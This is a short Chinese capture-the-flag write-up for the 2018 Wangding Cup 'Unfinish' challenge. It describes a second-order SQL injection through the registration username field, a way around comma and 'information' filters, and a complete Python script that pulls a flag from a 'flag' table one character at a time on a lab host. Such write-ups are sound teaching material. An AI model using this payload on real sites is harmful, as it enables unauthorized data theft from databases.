[网鼎杯2018]Unfinish

注册用了邮箱、账户名、密码，登录只用了邮箱和密码，登录进去后账户名显示出来了，推测存在二次注入

过滤了逗号和information，无法使用information_schema，猜测flag在flag表中
上脚本

#coding:utf-8
import requests
from bs4 import BeautifulSoup
import time 


url = 'http://2a3b6044-d59f-4a4f-ba8c-8c06a64cc813.node3.buuoj.cn/'

m = ''
for i in range(100):
    payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)  
    register = {'email':'abc{}@qq.com'.format(i),'username':payload,'password':'123456'}
    login = {'email':'abc{}@qq.com'.format(i),'password':'123456'}
    req = requests.session()
    r1 = req.post(url+'register.php',data = register)
    r2 = req.post(url+'login.php', data = login)
    r3 = req.post(url+'index.php')
    html = r3.text
    soup = BeautifulSoup(html,'html.parser')
    UserName = soup.span.string.strip()
    if int(UserName) == 0:
        break
    m += chr(int(UserName))
    print(m)
    time.sleep(1)

payload左右加0是为了防止报错

参考
https://zhuanlan.zhihu.com/p/150627938